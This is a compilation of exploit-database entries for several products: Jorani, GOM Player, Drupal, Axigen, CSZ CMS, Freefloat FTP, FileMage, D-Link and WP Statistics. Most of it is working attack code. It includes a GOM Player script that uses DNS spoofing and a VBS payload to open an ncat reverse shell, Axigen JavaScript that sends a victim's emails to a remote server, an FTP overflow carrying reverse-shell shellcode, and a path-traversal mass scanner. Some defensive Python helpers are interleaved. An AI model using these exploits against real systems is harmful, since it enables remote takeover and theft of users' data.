Upgrade-Insecure-Requests: 1
Referer: http://demo.jorani.org/session/login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 183

csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=
```

[+]Response:

```HTTP
HTTP/1.1 200 OK
date: Sun, 27 Aug 2023 06:03:04 GMT
content-type: text/html; charset=UTF-8
Content-Length: 681
server: Apache
x-powered-by: PHP/8.2
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; SameSite=Strict
set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly; SameSite=Lax
last-modified: Sun, 27 Aug 2023 06:03:04 GMT
vary: Accept-Encoding
cache-control: private, no-cache, no-store, proxy-revalidate, no-transform, must-revalidate
pragma: no-cache
x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1
x-iplb-instance: 27474
connection: close

<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
<h4>A PHP Error was encountered</h4>
<p>Severity: 8192</p>
<p>Message: strlen(): Passing null to parameter #1 ($string) of type string is deprecated</p>
<p>Filename: controllers/Connection.php</p>
<p>Line Number: 126</p>
</div>
<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
<h4>A PHP Error was encountered</h4>
<p>Severity: Warning</p>
<p>Message: Cannot modify header information - headers already sent by (output started at /home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p>
<p>Filename: helpers/url_helper.php</p>
<p>Line Number: 565</p>
</div>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)

## Time spent: 01:35:00
HireHackking

GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
# Date: 26.08.2023
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Version: 2.3.90.5360
# Tested on: Windows 10 Pro x64 22H2 19045.3324
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8
# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.

# Vulnerability Description:
# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the
# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.
# Full disclosure, developers should be more careful about software security.

# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.
# Some spaghetti and a bad code but it works :)

banner = """\033[38;5;196m+-----------------------------------------------------------+
|      GOM Player 2.3.90.5360 - Remote Code Execution       |
|  Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)   |
+-----------------------------------------------------------+\033[0m""" + """
\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""

import time,os,zipfile,subprocess,socket,sys

print(banner)

if os.geteuid() != 0:
    print("You need root privileges to run the exploit, please use sudo...")
    sys.exit(1)

targetIP = input("- Target IP address: ")
listenPort = input("- Listening port for Reverse Shell: ")

def fCreate(fileName,fileContent): # File create func.
    f = open(fileName,"w")
    f.write(fileContent)
    f.close()

gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
gateway = gw[2]
host = socket.gethostname()
print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)

print("\n[*]- Stage 1: Downloading neccesary tools...")
smbFolderName = "GomUpdater" # change this (optional)
expWorkDir = "gomExploitDir" # change this (optional)
os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability.
os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability.
os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
print(" [*] - Ncat has been downloaded.")
subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
print(" [*] - Impacket has been downloaded.")
subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
print(" [*] - DNSSpoof.py has been downloaded.")

print("[*]- Stage 2: Creating Attacker SMB Server...")
subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
time.sleep(5) # It's necessary for exploit stability.

smbIP = ipaddr
spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP

print("[*]- Stage 3: Creating Attacker Web Page...")
# change this (optional)
screenExpPage = """
<meta charset="utf-8">
<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script>
<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""'; </script>
"""
fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
time.sleep(3) # It's necessary for exploit stability.

print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
vbsCommand = '''Set shell=CreateObject("wscript.shell")
Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
WScript.Sleep 5000
Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
fCreate(expWorkDir + "/payload.vbs",vbsCommand)
urlShortcut = '''[InternetShortcut]
URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
IDlist='''
fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
time.sleep(3) # It's necessary for exploit stability.
zipName = expWorkDir + "/smb-shared/archive.zip"
payload_filename = os.path.join(expWorkDir, "payload.vbs")
with zipfile.ZipFile(zipName, "w") as malzip:
    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))

print("[*]- Stage 5: Running the attacker's web server...")
subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
time.sleep(3) # It's necessary for exploit stability.

print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
time.sleep(10) # It's neccesary for exploit stability.
os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target...
os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.

print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
subprocess.run("nc -lvnp " + listenPort,shell=True)
subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...
HireHackking

Drupal 10.1.2 - web-cache-poisoning-External-service-interaction

## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction
## Author: nu11secur1ty
## Date: 08/30/2023
## Vendor: https://www.drupal.org/
## Software: https://www.drupal.org/download
## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http

## Description:
It is possible to induce the application to perform server-side HTTP requests to arbitrary domains. The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was submitted in the HTTP Host header, and the application performed an HTTP request to that domain (the attacker-side log below shows the absolute rss.xml URL, built from the injected Host value, being fetched). In the second test the attacker stored a response with malicious content on the server. This can affect many users of the system if the attacker spreads a malicious URL, for example by email, combined with a redirect exploit.

STATUS: HIGH-Vulnerability

[+]Exploit:
```http
GET /drupal/web/?psp4hw87ev=1 HTTP/1.1
Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com
Accept-Encoding: gzip, deflate, psp4hw87ev
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, text/psp4hw87ev
Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 psp4hw87ev
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Origin: https://psp4hw87ev.pwnedhost.com
```

[+]Response from Burp Collaborator server:
```http
HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 62

<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>
```

[+]Response from Attacker server:
```
192.168.100.45 - - [30/Aug/2023 05:52:56] "GET /drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)

## Time spend:
03:35:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
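The evidence in the advisory is the canary from the Host header coming back as an absolute URL that something then fetched (the rss.xml line in the attacker server log). The following added Python example, written for this page and not taken from the advisory author or from Drupal, does the two things a practitioner wants here without touching a target: it scans a response body for absolute URLs built from a canary Host value, and it applies a trusted-host check of the kind Drupal configures through $settings['trusted_host_patterns'] in settings.php (anchored regular expressions matched case-insensitively against the Host header). The sample HTML and the pattern list are constructed for the demo and are not captured traffic.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Canary domain as used in the advisory's Host header.
CANARY_HOST = "d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com"

# Constructed sample response: what a Host-header-trusting site renders when
# the request carried the canary. The rss.xml path mirrors the attacker log
# above; the markup itself is invented for the demo.
SAMPLE_HTML = f"""<html><head>
<link rel="alternate" type="application/rss+xml" href="http://{CANARY_HOST}/drupal/web/rss.xml?psp4hw87ev=1" />
<link rel="canonical" href="http://{CANARY_HOST}/drupal/web/" />
<script src="/drupal/web/core/misc/drupal.js"></script>
</head><body><a href="https://www.drupal.org/">Drupal</a></body></html>"""


class _UrlCollector(HTMLParser):
    """Collects attribute values that browsers, feed readers or caches follow."""

    URL_ATTRS = {"href", "src", "action", "content"}

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in self.URL_ATTRS and value:
                self.urls.append(value)


def find_host_derived_urls(html, canary_host):
    """Return the absolute URLs in `html` whose host is the injected canary.

    Any hit means the application builds absolute URLs from the Host header;
    whoever follows those links (feed readers, a cache warming job, a browser)
    contacts the attacker's domain, which is the interaction the advisory saw.
    """
    collector = _UrlCollector()
    collector.feed(html)
    hits = []
    for candidate in collector.urls:
        parts = urlsplit(candidate)
        if parts.scheme in ("http", "https") and parts.hostname \
                and parts.hostname.lower() == canary_host.lower():
            hits.append(candidate)
    return hits


def host_is_trusted(host_header, trusted_patterns):
    """Emulate a trusted-host check on the raw Host header value.

    The port is stripped, the hostname is matched case-insensitively against
    each regular expression, and anything that is not a plain host:port
    (userinfo, paths, query) is rejected outright. Patterns should be anchored
    with ^ and $, e.g. r'^www\\.example\\.com$'.
    """
    if not host_header or any(ch in host_header for ch in "@/?#\\"):
        return False
    host = urlsplit("//" + host_header).hostname
    if not host:
        return False
    return any(re.search(pattern, host, re.IGNORECASE) for pattern in trusted_patterns)


if __name__ == "__main__":
    for url in find_host_derived_urls(SAMPLE_HTML, CANARY_HOST):
        print("Host-derived URL:", url)
    print("canary trusted:", host_is_trusted(CANARY_HOST, [r"^www\.example\.com$"]))
```

When the first function reports hits for a canary you supplied, the site is generating absolute links from an attacker-controlled header; the second function is the shape of the fix, and a Host value that it rejects should produce a 400 rather than a page.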
HireHackking

Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS

# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
# Google Dork: inurl:passwordexpired=yes
# Date: 2023-08-21
# Exploit Author: AmirZargham
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.0–4370c946) and older versions of Axigen WebMail
# Tested on: firefox,chrome
# CVE: CVE-2022-31470

Exploit

We use the second reflected XSS to exploit this vulnerability: create a malicious link and steal the user's emails.

Dropper code

This dropper code loads and executes the JavaScript exploit code from a remote server.

    ');x=document.createElement('script');x.src='https://example.com/exploit.js';window.addEventListener('DOMContentLoaded',function y(){document.body.appendChild(x)})//

Encoded form

    /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//

Exploit code

    xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new XMLHttpRequest();
    oob_server = 'https://example.com/';
    var script_tag = document.createElement('script');

    // 1. Load the webmail root; the redirect target carries the _h session token in its query string.
    xhr1.open('GET', '/', true);
    xhr1.onreadystatechange = () => {
      if (xhr1.readyState === XMLHttpRequest.DONE) {
        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];

        // 2. Touch a conversation to learn the folderId (a 401 means the session is gone).
        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`, true);
        xhr2.setRequestHeader('Content-Type', 'application/json');
        xhr2.onreadystatechange = () => {
          if (xhr2.readyState === XMLHttpRequest.DONE) {
            if (xhr2.status === 401) {
              script_tag.src = `${oob_server}?status=session_expired&domain=${document.domain}`;
              document.body.appendChild(script_tag);
            } else {
              resp = xhr2.responseText;
              folderId = JSON.parse(resp)["mails"][0]["folderId"];

              // 3. List the folder and exfiltrate the result, base64-encoded, to the out-of-band server.
              xhr3.open('GET', `/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
              xhr3.onreadystatechange = () => {
                if (xhr3.readyState === XMLHttpRequest.DONE) {
                  emails = xhr3.responseText;
                  script_tag.src = `${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
                  document.body.appendChild(script_tag);
                }
              };
              xhr3.send();
            }
          }
        };
        var body = JSON.stringify({isUnread: false});
        xhr2.send(body);
      }
    };
    xhr1.send();

Combining dropper and exploit

Host the exploit code somewhere and point the dropper code at it.

CSZ CMS 1.3.0 - Stored Cross-Site Scripting

# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL')
# Date: 2023/08/18
# CVE: CVE-2023-38910
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0

# Description:
# CSZ CMS 1.3.0 is vulnerable to stored cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Photo URL' and 'YouTube URL' fields of a carousel created in the 'Carousel Widget' section.

# Steps to reproduce the stored XSS:
1. Go to http://localhost/admin/carousel and create a carousel.
2. Edit the carousel created above: the "YouTube URL" and "Photo URL" fields accept arbitrary web scripts or HTML.
3. Inject the following payload:

Payload: <div><p title="</div><svg/onload=alert(document.domain)>">

# PoC Request:
POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/carousel/edit/3
Upgrade-Insecure-Requests: 1

carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow

#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
#Date: 08/22/2023
#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
#Vendor Homepage: http://www.freefoat.com
#Version: 1.0
#Tested on Windows XP SP3

#!/usr/bin/python3
import socket

# Metasploit shellcode:
#   msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d'
# Listener: nc -lvp 4444
#
# offset         = 247 bytes of filler before EIP is overwritten
# badchars       = \x00 \x0d
# return_address = \x3b\x69\x5a\x77 (ole32.dll), i.e. 0x775a693b written little-endian

payload = (
    b"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
    b"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
    b"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
    b"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
    b"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
    b"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
    b"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
    b"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
    b"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
    b"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
    b"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
    b"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
    b"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
    b"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
    b"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
    b"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
    b"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
    b"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
    b"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
    b"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
    b"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
    b"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
    b"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
    b"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
    b"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
    b"\x19"
)

# filler up to EIP + return address + short NOP sled + shellcode
buffer = b'A' * 247 + b"\x3b\x69\x5a\x77" + b'\x90' * 10 + payload


def main():
    ip = '192.168.146.135'
    port = 21
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    sock.recv(1024)                         # banner
    sock.send(b'USER anonymous\r\n')
    sock.recv(1024)
    sock.send(b'PASS anonymous\r\n')
    sock.recv(1024)
    sock.send(b'pwd ' + buffer + b'\r\n')   # oversized PWD argument overflows the stack buffer
    sock.close()


if __name__ == '__main__':
    main()
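The two numbers the script above depends on, the 247-byte offset and the little-endian return address, are what a practitioner has to recover before any shellcode matters. The following added Python example is mine, not the advisory author's code, and shows the standard offline workflow: generate a Metasploit-style cyclic pattern to send in place of the 'A's, take the value that lands in EIP from the debugger, map it back to an offset, and then assemble the same filler/return-address/NOP/shellcode layout the exploit uses. The return address 0x775a693b is the one from the advisory; the one-byte stand-in shellcode and the pattern lengths are demo values, and nothing here connects to a target.

```python
import string
import struct


def cyclic_pattern(length):
    """Build the classic non-repeating pattern Aa0Aa1Aa2... of `length` bytes.

    Each 3-byte chunk is upper+lower+digit with the digit varying fastest,
    so every 4-byte window is unique within the 20280-byte period and the
    bytes that end up in EIP identify their own position in the buffer.
    """
    chunks, total = [], 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("length exceeds the 20280-byte pattern period")


def pattern_offset(pattern, eip_value):
    """Return the offset of `eip_value` inside `pattern`, or -1.

    `eip_value` is either the 4 raw bytes or the 32-bit integer a debugger
    shows as EIP; the integer is packed little-endian because that is the
    byte order in which it was read from the stack.
    """
    needle = struct.pack("<I", eip_value) if isinstance(eip_value, int) else eip_value
    return pattern.find(needle)


def build_buffer(offset, ret_addr, shellcode, nop_count=10):
    """Assemble filler + little-endian return address + NOP sled + shellcode,
    the layout the PWD exploit above sends as its command argument."""
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_count + shellcode


if __name__ == "__main__":
    # Crash stage: send cyclic_pattern(400) instead of 'A' * 247, read EIP.
    pattern = cyclic_pattern(400)
    eip_from_debugger = struct.unpack("<I", pattern[247:251])[0]   # what the crash would show
    print("offset:", pattern_offset(pattern, eip_from_debugger))
    # Exploit stage: ole32.dll address from the advisory, INT3 as stand-in shellcode.
    print(build_buffer(247, 0x775A693B, b"\xcc")[240:262])
```

Send the pattern through the same USER/PASS/PWD sequence as the exploit, read EIP from the debugger attached to the FTP server, and feed that value to pattern_offset; the bad characters listed in the advisory (\x00, \x0d) never appear in the pattern, so it survives the same parsing path as the real payload.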

FileMage Gateway 1.10.9 - Local File Inclusion

# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
# Date: 8/22/2023
# Exploit Author: Bryce "Raindayzz" Harty
# Vendor Homepage: https://www.filemage.io/
# Version: Azure Versions < 1.10.9
# Tested on: All Azure deployments < 1.10.9
# CVE : CVE-2023-39026
# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
# Patch from vendor - https://www.filemage.io/docs/updates.html

import requests
import warnings

warnings.filterwarnings("ignore")


def worker(url):
    # Short timeout: this is a mass scanner, unresponsive hosts are skipped quickly
    response = requests.get(url, verify=False, timeout=.5)
    return response


def main():
    listIP = []
    file_path = input("Enter the path to the file containing the IP addresses: ")
    with open(file_path, 'r') as file:
        ip_list = file.read().splitlines()

    # The gateway's config.yaml contains a "tls" section; seeing that string in
    # the response is the marker that the traversal returned the file.
    searchString = "tls"
    for ip in ip_list:
        # Encoded backslashes (%5c) climb out of /mgmnt/ to C:\programdata\filemage\gateway\config.yaml
        url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
        try:
            response = worker(url)
            #print(response.text)
            if searchString in response.text:
                print("Vulnerable IP: " + ip)
                print(response.text)
                listIP.append(ip)
        except requests.exceptions.RequestException as e:
            print(f"Error occurred for {ip}: {str(e)}")

    for x in listIP:
        print(x)


if __name__ == '__main__':
    main()
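The traversal above works because the path reaches the file system with its `%5c` sequences still meaning backslash, so a filter that only looks for `../` in the raw request never fires. The following added Python example is mine, not FileMage's code, and puts that naive check beside the one a practitioner actually wants: decode, normalise separators and dot segments, then verify the resolved path is still under the served root. The request path is copied from the advisory; the mount prefix `/mgmnt/` and the root directory `/srv/filemage/www` are assumptions for the demo.

```python
import posixpath
from urllib.parse import unquote

# Request path from the advisory above (copied; host omitted).
TRAVERSAL_PATH = (
    "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c"
    "programdata%5cfilemage%5cgateway%5cconfig.yaml"
)
MOUNT_PREFIX = "/mgmnt/"            # assumed URL prefix the handler serves
WEB_ROOT = "/srv/filemage/www"      # assumed directory it is meant to serve from


def naive_is_safe(request_path):
    """The filter the traversal walks past: it inspects the still-encoded path
    for '../', so '..%5c' (an encoded backslash) is never seen as traversal."""
    return "../" not in request_path


def resolve_under_root(request_path, mount_prefix=MOUNT_PREFIX, root=WEB_ROOT):
    """Map a request path to a file under `root`, or return None.

    Steps: percent-decode twice (catches double encoding), reject NUL bytes,
    treat backslashes as separators (the gateway runs on Windows), normalise
    '.' and '..', and finally require the result to stay inside `root`. The
    containment check at the end is the security decision; everything before
    it only makes sure the comparison is done on the path the OS would see.
    """
    root = posixpath.normpath(root)
    decoded = unquote(unquote(request_path))
    if "\x00" in decoded:
        return None
    decoded = decoded.replace("\\", "/")
    if not decoded.startswith(mount_prefix):
        return None
    relative = decoded[len(mount_prefix):]
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def is_traversal_attempt(request_path, mount_prefix=MOUNT_PREFIX, root=WEB_ROOT):
    """True when a path under the served prefix resolves outside the root;
    useful as a detection rule over access logs as well as a request guard."""
    decoded = unquote(unquote(request_path)).replace("\\", "/")
    return decoded.startswith(mount_prefix) and resolve_under_root(request_path, mount_prefix, root) is None


if __name__ == "__main__":
    print("naive filter thinks it is safe:", naive_is_safe(TRAVERSAL_PATH))
    print("resolved:", resolve_under_root(TRAVERSAL_PATH))
    print("legit:", resolve_under_root("/mgmnt/files/report.pdf"))
```

Run is_traversal_attempt over the request paths in a web server log to find scanners using this exact encoding trick; in the handler itself, anything that resolves to None gets a 404 before any file system call.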

DLINK DPH-400SE - Exposure of Sensitive Information

# Exploit Title : DLINK DPH-400SE - Exposure of Sensitive Information
# Date : 25-08-2023
# Exploit Author : tahaafarooq
# Vendor Homepage : https://dlink.com/
# Version : FRU2.2.15.8
# Tested on: DLINK DPH-400SE (VoIP Phone)

Description:
After logging in to the web portal with the default credentials "guest:guest", the guest user can open the Maintenance tab, go to Access and modify users. This lets the guest account modify every user, including Admin, and view the passwords of all users in plaintext.

For a thorough POC writeup visit: https://hackmd.io/@tahaafarooq/dlink-dph-400se-cwe-200

POC :
1. Login with the default guest credentials "guest:guest".
2. Access the Maintenance tab.
3. Under the Maintenance tab, access the "Access" feature.
4. On "Account Option" choose a user to modify, for example "Admin", and click Modify.
5. Right-click on the password field and click Reveal; the password is then shown in plaintext.

WP Statistics Plugin <= 13.1.5 - Time based SQL injection (Unauthenticated)

# Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)
# Date: 13/02/2022
# Exploit Author: psychoSherlock
# Vendor Homepage: https://wp-statistics.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip
# Version: 13.1.5 and prior
# Tested on: wp-statistics 13.1.5
# CVE : CVE-2022-25148
# Vendor URL: https://wordpress.org/plugins/wp-statistics/
# CVSS Score: 8.4 (High)

import argparse
import re
import urllib.parse

import requests


def main():
    parser = argparse.ArgumentParser(description="CVE-2022-25148")
    parser.add_argument('-u', '--url', required=True, help='Wordpress base URL')
    args = parser.parse_args()
